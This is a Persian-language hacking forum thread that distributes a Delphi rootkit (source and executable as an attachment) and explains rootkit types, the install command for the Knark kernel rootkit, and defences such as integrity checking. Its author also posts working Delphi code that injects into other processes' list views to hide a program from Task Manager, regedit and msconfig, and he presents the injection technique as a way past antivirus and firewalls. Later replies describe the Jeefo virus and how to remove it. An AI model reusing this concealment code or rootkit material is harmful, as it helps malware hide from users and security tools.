امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5
rootkit
نویسنده پیام
lord_viper غایب
مدیر کل انجمن
*****

ارسال‌ها: 3,949
موضوع‌ها: 352
تاریخ عضویت: بهمن ۱۳۸۴

تشکرها : 5193
( 9875 تشکر در 2650 ارسال )
ارسال: #1
rootkit
با سلام
یکی از دوستان که ما بهشون خیلی ارادت داریم درخواست یه روتکیت یرای انالیز کرده بودن
این سورس یه روت کیت به زبان دلفی به همراه فایل exe و اموزش طریقه استفادش.
RootKitها برنامه هایی هستند که از نظر ساختار کاری بسیار شبیه Trojan ها و Backdoor ها هستند ولی با این تفاوت که شناسایی RootKit بسیار مشکلتر از درب های پشتی است زیرا RootKit ها علاوه بر اینکه به عنوان یک برنامه کاربردی خارجی مثل شنونده Netcat و ابزارهای درب پشتی مثل Sub7 بر روی سیستم اجرا می شوند بلکه جایگزین برنامه های اجرایی مهم سیستم عامل و در گاهی مواقع جایگزین خود هسته کرنل می شوند و به هکرها این اجازه را می دهند که از طریق درب پشتی و پنهان شدن در عمق سیستم عامل به آن نفوذ کنند و مدت زیادی با خیال راحت با نصب ردیابها ( Sniffer ) و دیگر برنامه های مانیتورینگ بر روی سیستم اطلاعاتی را که نیاز دارند بدست آورند. در دنیای هکرها دو نوع RootKit اصلی وجود دارد که هر کدام تعریف جداگانه ای دارند.
1- RootKit سنتی : RootKit های سنتی با شناسایی اولین RootKit بسیار قدرتمند در اویل سال 1990 در طول یک دهه گسترش پیدا کردند و تا آنجا پیش رفتند که امروزه انواع مختلفی از RootKit های سنتی وجود دارند که به طور عملی خودشان نصب شده و به هکرها اجازه می دهند که به سرعت سیستم قربانی را فتح کنند. RootKit های سنتی برای سیستم عامل های مختلف نوشته شده اند ولی به طور سنتی بر روی سیستم های یونیکس مثلHP-UX - AIX - Linux - Solaris - SunOS و از این قبیل تمرکز کرده اند. ولی برای ویندوزهای سرور مثل NT/2000 نیز RootKit هایی نوشته شده اند که جایگزین کتابخانه های پیوند پویا ( DLL ) شده و یا سیستم را تغییر می دهند ولی تعداد زیادی از RootKit ها برای سیستم های یونیکس نوشته شده اند. RootKit ها اجازه دسترسی Root یا Administrator را به ما نمی دهند و ما هنگامی قادر به نصب آْنها بر روی یک سیستم هستیم که دسترسی ریشه ای و مدیر یک سیستم را توسط روش های دیگری مثل سرریز بافر ... به دست آورده باشیم. بنابراین یک RootKit یک سری ابزارهایی است که با پیاده سازی یک درب پشتی ( Backdoor ) و پنهان کردن مدارک استفاده از سیستم و ردپاها به هکر اجازه نگهداری دسترسی سطح ریشه را می دهد. ساختار کار تروجن ها به این صورت است که فایلی را در داخل هسته سیستم مثل پوشه System32 اضافه می کند و این فایل تمامی پسوردهای قربانی را Log کرده و برای هکر می فرستد و یا با باز کردن پورتی اجازه ورود هکر را از طریق پورت باز شده می دهد ولی RootKit های سنتی به جای اینکه فایلی در هسته سیستم قربانی اضافه کنند، سرویسها و فایل های اصلی و مهم سیستم عامل قربانی را با یک نسخه تغییر یافته آن که عملیاتی مخرب انجام می دهد جایگزین می کنند. برای مثال RootKit های معروف در سیستم های یونیکس برنامه /bin/loginرا که یکی از اساسی ترین ابزارهای امنیتی در Unix است را با یک نسخه تغییر یافته که شامل یک کلمه عبور درب پشتی برای دسترسی سطح ریشه می باشد عوض می کنند. سیستم های یونیکس از برنامه /bin/login برای جمع آوری و تست UserID های کلمات عبور استفاده می کند. /bin/login شناسه کاربری و پسورد تایپ شده توسط کاربر را با فایل پسوردها مقایسه می کند تا تعیین کند که پسورد داده شده توسط کاربر صحیح است یا خیر. اگر پسورد داده شده درست باشد روتین /bin/loginبه آن User اجازه ورود به سیستم را می دهد. خب با این توضیحی که دادیم فرض کنید که یک RootKit این برنامه را با برنامه نوشته شده خود عوض کند. اگر هکر از پسورد ریشه درب پشتی استفاده کند، برنامه /bin/login تغییر یافته و اجازه دسترسی به سیستم را می دهد. حتی اگر مدیر سیستم پسورد ریشه اصلی را عوض کند، هکر هنوز می تواند با استفاده از کلمه عبور ریشه درب پشتی به سیستم وارد شود. بنابراین یک روتین RootKit ، /bin/login یک درب پشتی است زیرا می تواند برای دور زدن کنترل های امنیتی نرمال سیستم مورد استفاده قرار گیرد. علاوه بر آن یک اسب تروا هم هست زیرا فقط چهره آن یک برنامه نرمال و زیبای Login است ولی در اصل یک Backdoor است. اکثر RootKit ها سرویس ها و برنامه هایی مثل DU - Find - Ifconfig - Login - ls - Netstat - ps را با RootKit خود جابه جا می کنند. هر یک از این برنامه های سیستمی با یک اسب تروای منحصر به فرد جایگزین می شود که عملکرد آنها شبیه به برنامه عادی است. همه این برنامه های Unix مانند چشم و گوش های مدیران سیستم می باشد که تعیین می کنند چه فایل ها و سرویس هایی در حال اجرا هستند. هکرها با پوشاندن چشم و گوشهای مدیران سیستم که توسط RootKit انجام می شود می توانند به صورت موثری حضورشان را در یک سیستم مخفی نگه دارند. linux RootKit 5 ( lrk5 ) و Tornkit دو نمونه از RootKit های سنتی هستند که برای سیستم های Linux و Solaris نوشته شده اند و در سایت آشیانه می توانید این RootKit ها را پیدا کنید. این RootKit ها به محض نصب شدن در سیستم قربانی خود را با سرویس های حیاتی و مهم سیستم عامل که در بالا ذکر شد جایگزین می کنند.
2- RootKit سطح هسته : این نوع از RootKit ها نسبت به نوع سنتی بسیار حرفه ای تر هستند و از نظر سطح پنهان سازی بسیار پا را فراتر از نوع سنتی گذاشته اند زیرا این RootKit ها در سطح ریشه پیاده سازی می شوند و این کار شناسایی و کنترل کردن آنها را بسیار مشکل تر کرده است. RootKit های سطح هسته به ما کنترل کاملی از سیستم اصلی و یک امکان قدرتمند برای جایگیری می دهد. یک هکر با ایجاد تغییرات اساسی در خود هسته، می تواند سیستم را در سطحی بسیار اساسی کنترل کرده و قدرت زیادی برای دسترسی به درب پشتی و پنهان شدن در ماشین را به دست آورد. خود هسته در حالی که یک کرنل زیبا و کارآمد به نظر می رسد تبدیل به یک اسب تروا می شود و در حقیقت Kernel فاسد می شود ولی صاحب سیستم از این موضوع بی خبر می ماند. درحالی که یک RootKit سنتی جایگزین برنامه های سیستمی حیاتی مثل برنامه های ifconfig - ls ... می شود ، یک RootKit سطح هسته در حقیقت جایگزین هسته می شود و یا آن را تغییر می دهد. تمامی فایل ها - دستورها - پردازشها و فعالیت های شبکه ای در سیستم آلوده به RootKit هسته پنهان می شوند و تمامی اعمال به سود هکر ضبط می شود. اغلب RootKit های سطح ریشه توسطLKM ها پیاده سازی می شوند. نصب RootKit های سطح هسته ای که توسطLKM ها پیاده سازی شده باشد، بسیار راحت است. برای مثال برای نصبKnrak Rootkit که برای هسته لینوکس نوشته شده است، یک هکر که با Account سطح ریشه یا همان Root به آن سیستم وصل است تنها کافی است insmod knark.o, را تایپ کند و ماژول نصب می شود و منتظر دستورات هکر می ماند و حتی نیازی به بوت کردن دوباره سیستم هم ندارد. RootKit های سطح هسته برای ویندوز NT هم وجود دارند که یک Patch را بر روی خود هسته اجرایی ویندوز NT بدون استفاده ازLKM ها اعمال می کند. چند تا از معروف ترین RootKit های سطح هسته Knrak و Adore برای سیستم های لینوکس ، Plasmoid برای سیستم های Solaris و RootKit سطح هسته ویندوز NT برای سیستم های سرور ویندوز نام دارند که همگی در لینک RootKit در سایت آشیانه برای اعضای سایت قرار داده شده اند.
راه های مقابله با RootKit های سنتی و RootKit های سطح هسته
مهمترین راه دفاع در برابر RootKit ها اجازه ندادن به هکرها در دسترسی به حساب مدیر است. همانطور که در بالا ذکر شد یک هکر برای نصب یک RootKit باید دسترسی سطح ریشه داشته باشد و اگر ما بتوانیم همیشه راه های نفوذ و آسیب های جدید سیستم عاملمان را شناسایی و آنها را از بین ببریم شانس دستیابی هکر به حساب ریشه سیستم خود را تقریباً به صفر رسانده ایم. در مرحله بعد اگر فرض کنیم که با بی احتیاطی ما ، هکری توانست بر روی سیستم ما RootKit نصب کند، یکی از راه های تست این که سیستم ما RootKit شده است یا خیر استفاده از دستورEcho است. تعداد بسیار کمی از RootKit ها ، دستور echo را که برای لیست کردن محتویات یک دایرکتوری می باشد تروا می کنند و اکثر RootKit ها بر روی تروا کردن ls تمرکز کرده اند. به همین دلیل echo یک لیست قانونی از محتویات یک دایرکتوری را برمی گرداند و اگر نتیجه ای که echo بر می گرداند با چیزی که دستور ls برای دایرکتوری داده شده نشان می دهد متفاوت باشد ممکن است چیزی در آن دایرکتوری پنهان شده باشد که این نتیجه را می رساند که سیستم شما RootKit شده است. ولی در کل این روش زیاد موثر نیست چون جستجوی تمام سیستم فایل برای یافتن هر اختلافی بین فایل های لیست شده در خروجی Echo و ls وقت زیادی را صرف می کند. امروزه ابزارهای مختلفی برای آنالیز برنامه Rootkit/bin/login وجود دارد که مشخص می کنند آیا RootKit شناخته شده ای نصب شده است یا خیر. این ابزارها وقتی که بر روی سیستم نصب می شوند به صورت دوره ای فایل های مهم بر روی سیستم را مثل /bin/login چک می کنند تا از وجود RootKit باخبر شوند که برنامه ChRootkit ابزاری جالب در این زمینه است ولی درکل بهترین راه دفاع در برابر RootKit ها استفاده از تکنولوژی اثر انگشت دیجیتالی قوی می باشد تا به صورت دوره ای درستی فایل های سیستم بحرانی را تحقیق نماید. MD5 ( یک تابع درهم ساز یک طرفه ) یک الگوریتم بسیار مناسب برای محاسبه این نوع اثر انگشتهای قوی می باشد. با محاسبه یک اثر انگشت Encrypt شده قوی برای فایل های سیستمی مهم یک هکر قادر نخواهد بود که فایلی را تغییر داده و با همان اثر انگشت وارد شود.TripWire یک ابزار قوی برای تست صحت است که در سایت آشیانه برای دانلود قرار داده شده است. TripWire درهم سازی MD5 ای از فایل های بحرانی مثل/etc/passwd/bin/login - ls - ps و ... ساخته و به صورت دوره ای این درهم سازی را با یک پایگاه داده ای امن مقایسه می کند. در صورت تغییر در MD5 یک سرویس سریع به مدیر سیستم اطلاع می دهد. همچنین در RootKit های سطح هسته Scan پورت ها در شبکه که با استفاده از ابزارهایی مثل Nmap صورت گیرد پورت های شنونده را به مدیر امنیتی سیستم نشان خواهد داد. به همین دلیل پویش دوره ای سیستم در طول شبکه برای پیدا کردن رد RootKit بسیار مفید است. در آخر ذکر این نکته لازم است که اگر سیستم شما با تمام این ملاحظات آلوده به RootKit شد بهترین راه از بین بردن آن فرمت هسته و نصب مجدد سیستم عامل است.
موفق باشید


فایل‌(های) پیوست شده
.zip   rootkit.zip (اندازه: 273.11 KB / تعداد دفعات دریافت: 93)
۰۴-بهمن-۱۳۸۶, ۱۲:۰۰:۵۴
وب سایت ارسال‌ها
پاسخ
Di Di آفلاین
مدير بخش هك و كرك
*****

ارسال‌ها: 2,358
موضوع‌ها: 116
تاریخ عضویت: اسفند ۱۳۸۵

تشکرها : 1816
( 4046 تشکر در 1321 ارسال )
ارسال: #2
RE: rootkit
دستت درد نکنه. واقعا عالی بود.
برم یه خورده با این روت کیته بازی کنم ببینم فوتبالش چطوره ;)

۰۴-بهمن-۱۳۸۶, ۱۲:۴۱:۱۹
وب سایت ارسال‌ها
پاسخ
far_222000 آفلاین
مدير بخش ديتابيس
*****

ارسال‌ها: 955
موضوع‌ها: 68
تاریخ عضویت: شهریور ۱۳۸۴

تشکرها : 468
( 1249 تشکر در 422 ارسال )
ارسال: #3
RE: rootkit
سلام
خیلی خوب بود
ممنون

پارک24
مرجع خرید و فروش خودرو
۰۴-بهمن-۱۳۸۶, ۱۲:۴۸:۵۶
وب سایت ارسال‌ها
پاسخ
far_222000 آفلاین
مدير بخش ديتابيس
*****

ارسال‌ها: 955
موضوع‌ها: 68
تاریخ عضویت: شهریور ۱۳۸۴

تشکرها : 468
( 1249 تشکر در 422 ارسال )
ارسال: #4
RE: rootkit
ولی اینجا 1 سوالی برای من پیش می آد
روت کیت ها چه جوری خودشون رو جایگزین یه سرویس می کنن(یا یه سرویس دستکاری شده رو جایگزین سرویس سیستم عامل می کنن)؟
مگه سرویس ها همیشه Run نیستن؟ و سیستم عامل از بسته شدن اون ها جلوگیری نمی کنه؟

پارک24
مرجع خرید و فروش خودرو
۰۴-بهمن-۱۳۸۶, ۱۲:۵۰:۳۵
وب سایت ارسال‌ها
پاسخ
Di Di آفلاین
مدير بخش هك و كرك
*****

ارسال‌ها: 2,358
موضوع‌ها: 116
تاریخ عضویت: اسفند ۱۳۸۵

تشکرها : 1816
( 4046 تشکر در 1321 ارسال )
ارسال: #5
RE: rootkit
فکر می کنم جایگزینی نباشه بلکه همراه سرویس های ویندوز اجرا می شن.
برای مثال Jeefo ( اگه روت کیت محسوب بشه ) خودش رو به انتهای فایلهای اجرایی اضافه می کنه از جمله فایلهای خود ویندوز که در کنار اونها اجرا می شه.
همینطور با ستخت یه SVCHOST در روت ویندوز ، خودش رو توسط این سرویس اجرا می کنه و اگه داخل تسک منیجر رو ببینید یک گزینه دیگه به سرویسها اضافه شده که قابل حذف هم نیست.
البته شاید از راه های دیگه ای هم مثل اینجکشن استفاده بشه اما برای همه سروس های ویندوز فکر نمی کنم امکان پذیر باشه.

۰۴-بهمن-۱۳۸۶, ۱۳:۰۲:۲۴
وب سایت ارسال‌ها
پاسخ
far_222000 آفلاین
مدير بخش ديتابيس
*****

ارسال‌ها: 955
موضوع‌ها: 68
تاریخ عضویت: شهریور ۱۳۸۴

تشکرها : 468
( 1249 تشکر در 422 ارسال )
ارسال: #6
RE: rootkit
آخه Bind کردن یا Injection، همه و همه بالاخره داره توی فایل اجرایی دستکاری میکنه و اگه فایل اجرا باشه نمی شه این کار رو انجام داد
مثلاً شما یه بیندر بنویس بگو خودشو به Explorer.exe، بچسبونه، Error می ده که این فایل بازه و داره استفاده می شه!!!

پارک24
مرجع خرید و فروش خودرو
۰۴-بهمن-۱۳۸۶, ۱۳:۱۲:۵۲
وب سایت ارسال‌ها
پاسخ
lord_viper غایب
مدیر کل انجمن
*****

ارسال‌ها: 3,949
موضوع‌ها: 352
تاریخ عضویت: بهمن ۱۳۸۴

تشکرها : 5193
( 9875 تشکر در 2650 ارسال )
ارسال: #7
RE: rootkit
با سلام
ببینین وقتی یه پروسه میخواهد ایجاد بشه system memory managment با استفاده از یک سری پارامترها یک فضای ادرسی برای اون پروسه ایجاد میکنه با فرمان createprocess یک پروسس خالی ایجاد میکنه فایل exe رو باز میکنه و نقطه entry point(ep) اون روپیدا میکنه و کد باینری رو داخل پروسس قرار میده و اجرا میکنه در حالا ما میتونیم با استفاره از یک سری api توی این فضای ادرسی پروسه مورد نظر یک مقداری فضا برای کدمون رزرو کرده و کدمونو اونجا بازنویسی کنیم وبا یک remutethread کدمونو اجرا کنیم با این کار انگار اون پروسه داره این کارها رو انجام میده که معمولا از این روش برای دور زدن انتی ویروسها و فایروالها استفاده میشه
در مورد ویروس جیفو که بصورت static injection هست اصلا ربطی به روت کیت نداره فقط برای اجرا شدن و قرار گرفتن در حافضه اول خودشو به ته فایل میچسبونه بعد میره به ep اون فایل به اولین جامپ که رسید اونو تغییر میده و میبره به سطر اول کد خودش و اخر کد خودشو جامپ میده به مکانی که جامپ اصلی برنامه اشاره میکرد.
یه مثال ساده از روتکیتها این یه کد اینجکشنه که خودم نوشتم برای کاری ..... بماند

// listview injection by lord_viper//

//ghoghnoose.dana@gmail.com//

//www.quecode.com//





unit lviinjection;

interface
uses
classes,windows,messages,commctrl,sysutils;

procedure lviw32injection(h:hwnd;item:string);

implementation

procedure lviw32injection(h:hwnd;item:string);
var
handle:thandle;
lvi:TLVFindInfo;
p:pointer;
pid:dword;
i:integer;
w:cardinal;
begin
GetWindowThreadProcessId(h,pid);
handle:=OpenProcess(PROCESS_ALL_ACCESS,FALSE,pid);
p:=virtualallocex(handle,nil,sizeof(lvi),MEM_COMMIT,PAGE_READWRITE);
lvi.psz:=virtualallocex(handle,nil,sizeof(item),MEM_COMMIT,PAGE_READWRITE);
lvi.flags:=LVFI_STRING;
writeprocessmemory(handle,lvi.psz,pchar(item),length(item),w);
writeprocessmemory(handle,p,@lvi,sizeof(lvi),w);
i:= SendMessage(h, LVM_FINDITEM, WPARAM(-1), LPARAM(p));
ListView_DeleteItem(h,i);
VirtualFreeEx(handle,Lvi.psz, 0, MEM_RELEASE);
VirtualFreeEx(handle, p, 0, MEM_RELEASE);
end;
end.
با استفاده از این کد که یه structure رو به listviewتزریق و از اطلاعات داخل اون استفاده میکنه
با این تیکه کد تونستم برنامم رو از تسکمنجر بخش پروسس بردارم اگه داخل پوشه محل قرار گیریش برین چیزی نمیبینین داخل regedit هم کلیدهای نوشته شدش قابل رویت نیستن و داخل msconfig هم بخش استارت اپ رونو نشون نمیده چون تمام این پنجره ها یه shellistview هستند که با تزریق کد به اونها اسم برناممو از داخلشون حذف کردم
ولی روتکیتهای واقعی خودشونو به dll های ویندوز یا حتی خود کرنل تزریق میکنند در اون صورت وقتی کد شما بجای توابه api می بشینه و برنامه ها هم برای کارهاشون و ارتباط با سیستمعامل از توابع api استفاده میکنن اونوقته که هیچی جلودار شما نیست
۰۴-بهمن-۱۳۸۶, ۱۷:۳۹:۰۴
وب سایت ارسال‌ها
پاسخ
Di Di آفلاین
مدير بخش هك و كرك
*****

ارسال‌ها: 2,358
موضوع‌ها: 116
تاریخ عضویت: اسفند ۱۳۸۵

تشکرها : 1816
( 4046 تشکر در 1321 ارسال )
ارسال: #8
RE: rootkit
بایند کردن ویروس به انتهای فایل هایی نظیر Explorer یک کار چند مرحله ای هستش.
پس از اولین اجرا ، ویروس یک فایل سرویس سیستمی تعریف می کنه تا در هنگام لود شدن سیستم به طور خودکار اجرا بشه.
پس از ریستارت ویندوز و در هنگام لودینگ، قبل از اینکه Explorer اجرا بشه ، ویروس توسط سرویس اجرا شده و فایل Explorer رو آلوده می کنه.
با همین روش می شه خیلی از فایلهای ویندوز رو آلوده کرد.

۰۴-بهمن-۱۳۸۶, ۱۸:۰۷:۰۰
وب سایت ارسال‌ها
پاسخ
lord_viper غایب
مدیر کل انجمن
*****

ارسال‌ها: 3,949
موضوع‌ها: 352
تاریخ عضویت: بهمن ۱۳۸۴

تشکرها : 5193
( 9875 تشکر در 2650 ارسال )
ارسال: #9
RE: rootkit
جناب didi هیچ سرویسی تعریف نمیشه این ویروس در اولین حرکت خودش سرویس svchost رو الوده میکنه که کارش لود کردن فایلهای exeبه رم هستش و به همین خاطر
1= همیشه تو رم میمونه
2=تمام فایلهای exe رو الوده میکنه
3=باعث کند شدن سیستم میشه
4=ارور generic host process for win 32 میده
۰۴-بهمن-۱۳۸۶, ۲۳:۵۴:۲۵
وب سایت ارسال‌ها
پاسخ
Di Di آفلاین
مدير بخش هك و كرك
*****

ارسال‌ها: 2,358
موضوع‌ها: 116
تاریخ عضویت: اسفند ۱۳۸۵

تشکرها : 1816
( 4046 تشکر در 1321 ارسال )
ارسال: #10
RE: rootkit
سلام
ببخشید جناب لرد عزیز!
من برای پاسخ به سوال Far_222000 در مورد چگونگی آلوده شدن فایلهای ویندوز، یه مقدار وقت تلف کردم و در همین بین شما جواب ایشون رو دادید و من هم بدون اطلاع از پاسخ شما این پست رو زدم! اینکه که یخورده بد فرم شده!! واگه می دونستم شما پاسخ دادید اصلا این پست رو نمی دادم با لااقل یکمی تغییرش می دادم!!
در هر صورت این یه توضیح مختصر در مورد فعالیت Jeefo هست:
----------------------------------------------------------------------------------------------------------------------------
When an W32/Jeefo infected file is opened, the file SVCHOST.EXE (36,352 Bytes) in %WinDIR% is created.

The following registry entry in startup system is made, on Windows 9x computers:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\_CurrentVersion\RunServices"PowerManager" = %WinDIR%\SVCHOST.EXE

On Windows NT/2000/XP the file is created with the following characteristics:

Description: Manages the power save features of the computer
Display Name: Power Manager Start
Type: Automatic
Account: Local system

When activated in computer memory, the virus tries to infect PE files.

منبع :

http://www.avira.com/en/threats/section/...jeefo.html
----------------------------------------------------------------------------------------------------------------------

طبق این توضیحات اولین کاری که جیفو بعد از اجرا انجام می ده ساخت یک فایل SVCHODT در روت ویندوز هست و بعد خودش رو با سرویسی که به نام Power MAnager start نمایش داده می شه خودش رو اجرا می کنه و در مراحل بعدی همونطور که شما هم گفتید به سراغ PE فایلهای اجرایی می ره و اونها رو آلوده می کنه.

۰۵-بهمن-۱۳۸۶, ۱۲:۱۶:۴۶
وب سایت ارسال‌ها
پاسخ
lord_viper غایب
مدیر کل انجمن
*****

ارسال‌ها: 3,949
موضوع‌ها: 352
تاریخ عضویت: بهمن ۱۳۸۴

تشکرها : 5193
( 9875 تشکر در 2650 ارسال )
ارسال: #11
RE: rootkit
خواهش میکنم جناب didi همیشه 2 تا جواب خوب بهتر از یکیه
اینم یه کم تاریخچه signature و روش پاک سازی دستی از سیستم(نه از فایلهای الوده شده)
Jeefo (computer virus)
From Wikipedia, the free encyclopedia
Jump to: navigation, search
The Jeefo Virus, also known as the Hidrag Virus is a computer virus which was made by the same hackers who created the Gedza Virus. It infects Windows Portable Executable files. It begins infection by entering the registry on the computer, specifically in the Run at startup key. It also files itself as an actual program in the registry as well. If you do not clear its 3 places of residence, it will immediately copy itself back into each of the listed directories.


[edit] Symptoms
1. Memory Usage is High 2. Executables do not launch 3. Multiple instances of svchost.exe launched in the task manager


[edit] Resolution
1. Delete the mother virus from 'C:/Windows/svchost.exe'

a. If the file cannot be deleted, simply rename the file to a non executable file ie: 'svchost.txt', relaunch the computer in safe mode and then delete the .txt file
2. Clean the start up registry of ALL listings

a. Start > Run > regedit
b. Browse to HKEY_LOCAL_MACHINE > Software > Microsoft > Windows > CurrentVersion > Run
c. Delete all entries in all the folders prefixed with 'Run*' ie: (RunOnce etc.)
3. Clean the actual virus from the registry

a. Start > Run > regedit
b. Browse to HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Services > PowerManager
c. Delete the actual folder on the left 'PowerManager'.
4. Reboot the Machine, check again in the steps above, to make sure no traces of the virus reside!

[If that does not work, Sophos has a fix tool that completely scans the computer for traces of Jeefo. Note: Some antivirus scanners pick the sophos tool as Malware. This tool is completely safe, and has been tested on 10+ networked computers.]FIX LINK

Common Names and their respected detectors: Virus.Win32.Hidrag.a (Kaspersky) W32/Jeefo (McAfee) W32.Jeefo (Symantec) W32/Hidrag.a (Avira) W32/Jeefo-A (Sophos) Virus:Win32/Jeefo.A (Microsoft)
۰۵-بهمن-۱۳۸۶, ۱۶:۰۶:۱۰
وب سایت ارسال‌ها
پاسخ


موضوعات مرتبط با این موضوع...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  آموش rootkit تحت ویندوز xxxzzz17 1 2,343 ۰۵-دى-۱۳۹۰, ۱۱:۱۹:۳۳
آخرین ارسال: lord_viper
  اطلاعات کامل در مورد Rootkit r00t_3xtr4ct0r 0 2,871 ۰۱-شهریور-۱۳۸۳, ۱۵:۱۷:۲۹
آخرین ارسال: r00t_3xtr4ct0r

پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 3 مهمان

صفحه‌ی تماس | IranVig | بازگشت به بالا | | بایگانی | پیوند سایتی RSS